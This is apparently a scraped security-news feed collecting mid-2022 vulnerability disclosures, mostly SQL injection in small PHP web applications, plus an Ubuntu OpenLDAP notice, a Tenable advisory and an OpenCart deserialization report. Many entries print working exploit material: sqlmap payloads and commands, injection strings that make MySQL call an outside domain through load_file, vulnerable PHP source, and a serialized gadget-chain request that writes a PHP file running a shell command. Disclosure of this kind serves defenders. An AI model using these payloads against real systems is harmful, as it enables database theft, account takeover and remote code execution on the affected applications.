In Covid 19 Travel Pass Management 1.0, the code parameter is vulnerable to SQL injection attacks.

The code parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+' was submitted in the code parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system.

\--\-
Parameter: code (GET)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' OR NOT 7325=7325 AND 'vRQn'\='vRQn

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 1607 FROM(SELECT COUNT(\*),CONCAT(0x7171707071,(SELECT (ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'\='HjrM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'\='bdqR

    Type: UNION query
    Title: MySQL UNION query (NULL) \- 10 columns
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
\---

<?php

if(isset($\_GET\['code'\]) && $\_GET\['code'\] > 0){
    $qry = $conn\->query("SELECT \* FROM application\_list where code = '{$\_GET\['code'\]}'");
    if($qry\->num\_rows > 0){
        foreach($qry\->fetch\_assoc() as $k => $v){
            $$k\=$v;
        }
		if(isset($individual\_id)){
			$user\_qry = $conn\->query("SELECT \*, concat(lastname, ', ', firstname, ' ', coalesce(middlename,'')) as \`name\` from \`individual\_list\` where id = '{$individual\_id}' ");
			if($qry\->num\_rows > 0){
				foreach($user\_qry\->fetch\_assoc() as $k => $v){
					$inv\[$k\]=$v;
				}
				$meta\_qry = $conn\->query("SELECT \* FROM \`individual\_meta\` where \`individual\_id\` = '{$individual\_id}' ");
				while($row = $meta\_qry\->fetch\_assoc()){
					$inv\[$row\['meta\_field'\]\] = $row\['meta\_value'\];
				}
			}
		}
    }
}
?>

CVE-2022-30054: CVE-nu11secur1ty/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management at main · nu11secur1ty/CVE-nu11secur1ty

In Toll Tax Management System 1.0, the id parameter appears to be vulnerable to SQL injection attacks.

The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata\_tupako.net\\wzm'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

\--\-
Parameter: id (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1'+(select load\_file('\\\\\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata\_tupako.net\\\\wzm'))+'' RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(select load\_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+'' ELSE 0x28 END)) AND 'XhmU'\='XhmU

    Type: error\-based
    Title: MySQL \>= 5.0 OR error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=1'+(select load\_file('\\\\\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata\_tupako.net\\\\wzm'))+'' OR (SELECT 2787 FROM(SELECT COUNT(\*),CONCAT(0x716a7a7a71,(SELECT (ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'\='CIPJ

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1'+(select load\_file('\\\\\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata\_tupako.net\\\\wzm'))+'' AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'\='XHBJ

    Type: UNION query
    Title: MySQL UNION query (NULL) \- 6 columns
    Payload: id\=1'+(select load\_file('\\\\\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata\_tupako.net\\\\wzm'))+'' UNION ALL SELECT CONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
\---

CVE-2022-30053: CVE-nu11secur1ty/vendors/oretnom23/2022/Toll-Tax-Management-System at main · nu11secur1ty/CVE-nu11secur1ty

In Home Clean Service System 1.0, the password parameter is vulnerable to SQL injection attacks.

**Home Clean Service System****Vendor**

**Description:**

The password parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

\[+\] Payloads:

\--\-
Parameter: MULTIPART email ((custom) POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(\*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--
\--\-

**Vulnerable code:**

<?php
	session\_start();
	$username = $\_POST\['username'\];
	$password = $\_POST\['password'\];
	if(ISSET($\_POST\['login'\])){
		$conn = new mysqli("localhost","root","","activity") or die(mysqli\_error());
		$query = $conn\->query("SELECT \*FROM \`admin\` WHERE \`username\` = '$username' && \`password\` = '$password'") or die(mysqli\_error());
		$fetch = $query\->fetch\_array();
		$valid = $query\->num\_rows;
			if($valid > 0){
				$\_SESSION\['admin\_id'\] = $fetch\['admin\_id'\];
				header("location:./dashboard.php");
			}else{
				echo "<script>alert('Invalid username or password')</script>";
				echo "<script>window.location = 'index.php'</script>";
			}
		$conn\->close();
	}	

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-30052: CVE-nu11secur1ty/vendors/acetech/2022/Home-Clean-Service-System at main · nu11secur1ty/CVE-nu11secur1ty

Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.

CVE-2022-29581: 🐧🕺

Ubuntu Security Notice 5424-1 - It was discovered that OpenLDAP incorrectly handled certain SQL statements within LDAP queries in the experimental back-sql backend. A remote attacker could possibly use this issue to perform an SQL injection attack and alter the database.

==========================================================================  
Ubuntu Security Notice USN-5424-1  
May 17, 2022

openldap vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

OpenLDAP could be made to perform arbitrary modifications to the database.

Software Description:  
- openldap: Lightweight Directory Access Protocol

Details:

It was discovered that OpenLDAP incorrectly handled certain SQL statements  
within LDAP queries in the experimental back-sql backend. A remote attacker  
could possibly use this issue to perform an SQL injection attack and alter  
the database.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  slapd                           2.5.11+dfsg-1~exp1ubuntu3.1

Ubuntu 21.10:  
  slapd                           2.5.6+dfsg-1~exp1ubuntu1.1

Ubuntu 20.04 LTS:  
  slapd                           2.4.49+dfsg-2ubuntu1.9

Ubuntu 18.04 LTS:  
  slapd                           2.4.45+dfsg-1ubuntu1.11

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5424-1  
  CVE-2022-29155

Package Information:  
  https://launchpad.net/ubuntu/+source/openldap/2.5.11+dfsg-1~exp1ubuntu3.1  
  https://launchpad.net/ubuntu/+source/openldap/2.5.6+dfsg-1~exp1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/openldap/2.4.49+dfsg-2ubuntu1.9  
  https://launchpad.net/ubuntu/+source/openldap/2.4.45+dfsg-1ubuntu1.11

Ubuntu Security Notice USN-5424-1

Online Discussion Forum Site version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection# Date: 15/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Code:line 3 in file "/odfs/posts/view_post.php"$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");# Sqlmap command:sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post

Online Discussion Forum Site 1.0 SQL Injection

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0 is vulnerable to a SQL injection attack in the username field. SSO or System authentication are required to be enabled for vulnerable conditions to exist.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-17

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

Affected Products

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0

****FREE FOR 30 DAYS****

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

FREE FOR 30 DAYS Enjoy full access to detect and fix cloud infrastructure misconfigurations in the design, build and runtime phases of your software development lifecycle.

**Buy Tenable.cs**

Contact a Sales Representative to learn more about Cloud Security and how you can secure every step from code to cloud.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

CVE-2022-1731: Metasonic Doc WebClient SQL Injection

The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users

Tag

#sql